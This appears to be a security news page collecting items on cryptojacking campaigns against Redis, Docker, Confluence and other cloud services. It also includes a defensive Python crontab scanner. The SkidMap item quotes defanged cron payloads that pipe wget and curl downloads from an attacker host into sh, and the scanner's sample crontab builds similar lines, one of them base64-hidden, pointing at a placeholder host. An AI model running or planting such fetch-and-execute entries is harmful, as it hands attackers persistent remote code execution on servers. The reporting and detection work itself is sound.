A recent attack campaign targeted publicly accessible Docker, Hadoop, Confluence, and Redis deployments. The attackers exploited misconfigurations and known vulnerabilities to implant cryptominers on compromised systems. As Linux admins, infosec professionals, Internet security enthusiasts, and sysadmins, it is crucial that we understand the implications of this attack and take appropriate measures to protect our systems.

What Is the Significance of This Cloud Security Threat?

This campaign is unique in deploying previously unseen payloads, including four binaries written in Golang. The attackers exploit common misconfigurations and vulnerabilities to gain initial access, then employ a series of shell scripts and Linux attack techniques to establish persistence and deliver a cryptocurrency miner. This level of sophistication raises questions about the attackers' resources and intentions.

The complexity of the infection chain in this attack is also notable. It involves over 10 shell scripts, binaries, persistence mechanisms, backup payload delivery methods, anti-forensics techniques, and user-mode rootkits. This complexity demonstrates the effort attackers are willing to put into compromising systems. As security practitioners, we must be aware of threat actors' evolving tactics and techniques and continuously adapt our defense strategies.

An intriguing aspect of this attack is the use of the shopt command in the shell scripts to prevent additional commands from being written to the history file. This anti-forensics technique effectively hides the attackers' activities. It is concerning that such techniques have not been observed in other campaigns, indicating the constant innovation and evolution of malware. Are other attackers using similar methods, and how can we detect and defend against them?

This attack has significant implications for Linux users. It highlights the importance of regularly patching vulnerabilities and correcting insecure configurations in Docker, Hadoop, Confluence, and Redis deployments. Additionally, it emphasizes the need for ongoing monitoring and threat intelligence to detect and respond to such attacks promptly.

The long-term consequences of this attack are concerning. It raises questions about the overall security posture of cloud environments and the inherent risks associated with exposing web-facing services to the Internet. As more organizations move to cloud-based deployments, the potential for attacks targeting these environments increases. Security practitioners must stay informed about reported vulnerabilities in cloud services and implement robust security measures.

Our Final Thoughts on This Recent Attack

This article serves as a wake-up call for Linux admins. The targeted attack campaign discussed here demonstrates threat actors' evolving tactics and techniques. It underscores the importance of maintaining strong security practices, regularly patching vulnerabilities, and continuously monitoring and adapting defense strategies. By staying informed, proactive, and vigilant, we can mitigate the risks posed by such attacks and protect our systems from compromise.

Brittany Day
The P2PInfect botnet worm is going through a period of highly elevated activity, starting in late August 2023 and picking up again in September 2023.

P2PInfect was first documented by Unit 42 in July 2023 as peer-to-peer malware that breaches Redis instances using a remote code execution flaw on internet-exposed Windows and Linux systems. Cado Security researchers, who have been following the botnet since late July 2023, report today seeing global activity, with most breaches impacting systems in China, the United States, Germany, Singapore, Hong Kong, the UK, and Japan. Additionally, Cado says the latest P2PInfect samples feature additions and improvements that make the malware more capable of spreading to targets and showcase its continuous development.

LinuxSecurity.com Team
According to recent reports, there have been instances of threat actors using malware called "SkidMap" to exploit vulnerable Redis systems.

Earlier versions of SkidMap were used to surreptitiously mine cryptocurrency and to create false network traffic and CPU usage readings by loading malicious kernel modules. However, the recent version of this malware appears considerably more sophisticated and targets only open Redis instances. Further analysis of the new SkidMap variant revealed behaviours such as adapting to the operating system it runs on and choosing which binary to download based on the Linux distribution and architecture of the infected system.

Initially, the threat actor attempts to log in to open Redis instances and set up cron tasks whose payload is stored in a variable as a base64-encoded string. The decoded string consists of two cron tasks, one running "wget" (wget hxxp://z[.]shavsl[.]com/b -qO - | sh) and one running "curl" (curl -fsSL hxxp://z[.]shavsl[.]com/b | sh), each executed at a 10-minute interval to download the dropper scripts 'b', 'c' and 'f'.

LinuxSecurity.com Team
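As an added, defender-side example (not code from the article or from the SkidMap reports), the script below scans crontab text for the persistence pattern described above: entries that pipe a wget or curl download straight into a shell, including entries that hide that command behind a base64-encoded string. The sample crontab, its schedule and the hostname are constructed placeholders.

```python
import base64
import binascii
import re

# A wget/curl invocation whose output is piped into sh or bash.
FETCH_EXEC = re.compile(r"\b(?:wget|curl)\b[^|;\n]*\|\s*(?:ba)?sh\b")
# Candidate base64 tokens; 16+ chars filters out short flags and words.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decode_b64_tokens(line):
    """Return the decoded text of every base64-looking token in a line
    that decodes cleanly to printable ASCII; other tokens are ignored."""
    decoded = []
    for tok in B64_TOKEN.findall(line):
        try:
            text = base64.b64decode(tok, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError, ValueError):
            continue
        if all(c.isprintable() or c in "\n\t" for c in text):
            decoded.append(text)
    return decoded


def scan_crontab(text):
    """Return (line_no, reason, evidence) for each suspicious cron entry."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if FETCH_EXEC.search(line):
            findings.append((n, "fetch-and-execute", line))
            continue
        # Fetch-and-execute concealed inside a base64 blob (SkidMap style).
        for payload in decode_b64_tokens(line):
            if FETCH_EXEC.search(payload):
                findings.append((n, "base64-hidden fetch-and-execute", payload))
                break
    return findings


# Constructed sample crontab (not a real capture); the host is a placeholder.
HIDDEN_CMD = "curl -fsSL http://dropper.example.invalid/b | sh"
SAMPLE_CRONTAB = "\n".join([
    "0 3 * * * /usr/local/bin/backup.sh",
    "*/10 * * * * echo " + base64.b64encode(HIDDEN_CMD.encode()).decode() + " | base64 -d | sh",
    "*/10 * * * * wget http://dropper.example.invalid/b -qO - | sh",
    "30 1 * * 0 /usr/bin/logrotate /etc/logrotate.conf",
])

if __name__ == "__main__":
    for line_no, reason, evidence in scan_crontab(SAMPLE_CRONTAB):
        print(f"line {line_no}: {reason}: {evidence}")
```

Run it against the output of crontab -l for each user and the files under /etc/cron.d to review entries that fetch and execute remote content.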
The evasive new Pro-Ocean cryptojacking malware is sidestepping security defenses and targeting Apache, Oracle and Redis servers.

A financially motivated threat actor notorious for its cryptojacking attacks has leveraged a revised version of its malware to target cloud infrastructure using vulnerabilities in web server technologies, according to new research. Deployed by the China-based cybercrime group Rocke, the Pro-Ocean cryptojacking malware now comes with improved rootkit and worm capabilities, as well as new evasion tactics to sidestep cybersecurity companies' detection methods, Palo Alto Networks' Unit 42 researchers said in a Thursday write-up. "Pro-Ocean uses known vulnerabilities to target cloud applications," the researchers detailed. "In our analysis, we found Pro-Ocean targeting Apache ActiveMQ (CVE-2016-3088), Oracle WebLogic (CVE-2017-10271) and Redis (unsecure instances)."

The link for this article located at The Hacker News is no longer available.

LinuxSecurity.com Team